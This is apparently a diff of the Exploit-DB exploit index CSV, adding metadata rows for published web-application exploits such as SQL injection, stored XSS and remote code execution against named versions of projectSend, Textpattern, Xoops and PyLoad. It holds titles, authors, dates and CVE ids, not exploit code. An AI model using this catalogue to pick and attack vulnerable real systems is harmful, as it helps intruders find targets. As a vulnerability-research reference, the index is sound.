39567,exploits/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",webapps,php,80,2016-03-28,2016-03-28,0,,,,,http://www.exploit-db.commonstra-3.0.3.zip,
@ -24760,6 +24764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,webapps,php,,2011-10-26,2011-12-21,0,OSVDB-76573;CVE-2011-5185,,,,,
43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80,2018-02-07,2018-02-07,1,,"SQL Injection (SQLi)",,,,
50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",2021-12-14,"Yehia Elghaly",webapps,php,,2021-12-14,2021-12-14,0,,,,,,
51521,exploits/php/webapps/51521.txt,"Online Thesis Archiving System v1.0 - Multiple-SQLi",2023-06-14,nu11secur1ty,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,,2018-07-04,2018-07-04,0,CVE-2018-12908,,,,,
50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,,2021-08-20,2021-08-20,0,,,,,,
@ -28102,8 +28107,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
51517,exploits/php/webapps/51517.txt,"projectSend r1605 - CSV injection",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
51518,exploits/php/webapps/51518.txt,"projectSend r1605 - Stored XSS",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip,
@ -30490,6 +30497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,,2021-06-10,2021-06-10,0,,,,,http://www.exploit-db.comtextpattern-4.8.7.zip,
49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
51523,exploits/php/webapps/51523.txt,"Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
2965,exploits/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,webapps,php,,2006-12-19,,1,OSVDB-32381;CVE-2006-6686,,,,,
25997,exploits/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,webapps,php,,2005-07-18,2013-06-07,1,,,,,,https://www.securityfocus.com/bid/14303/info
1611,exploits/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,webapps,php,,2006-03-24,2016-06-30,1,OSVDB-24164;CVE-2006-1412,,,,http://www.exploit-db.comtftgallery-0.10.zip,
@ -33991,6 +33999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43827,exploits/php/webapps/43827.txt,"XOOPS < 2.0.11 - Multiple Vulnerabilities",2015-06-29,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00079;CVE-2005-2112;CVE-2005-2113,,,,,http://gulftech.org/advisories/XOOPS%20Multiple%20Vulnerabilities/79
9249,exploits/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,webapps,php,,2009-07-23,,1,OSVDB-56598;CVE-2009-4714;OSVDB-56597;CVE-2009-4713;OSVDB-56596;OSVDB-56595;CVE-2009-4698;OSVDB-56594;OSVDB-56593,,,,,
9261,exploits/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php,,2009-07-26,2016-10-27,1,CVE-2009-4698;OSVDB-56595;OSVDB-56594;OSVDB-56593,,,,,
51520,exploits/php/webapps/51520.txt,"Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
37376,exploits/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,webapps,php,,2012-06-12,2015-06-26,1,,,,,,https://www.securityfocus.com/bid/53945/info
3849,exploits/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",webapps,php,,2007-05-03,,1,OSVDB-34472;CVE-2007-2543,,,,,
39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,CVE-2014-3935;OSVDB-107104,,,,,https://www.securityfocus.com/bid/67460/info
@ -34516,6 +34525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,

Can't render this file because it is too large.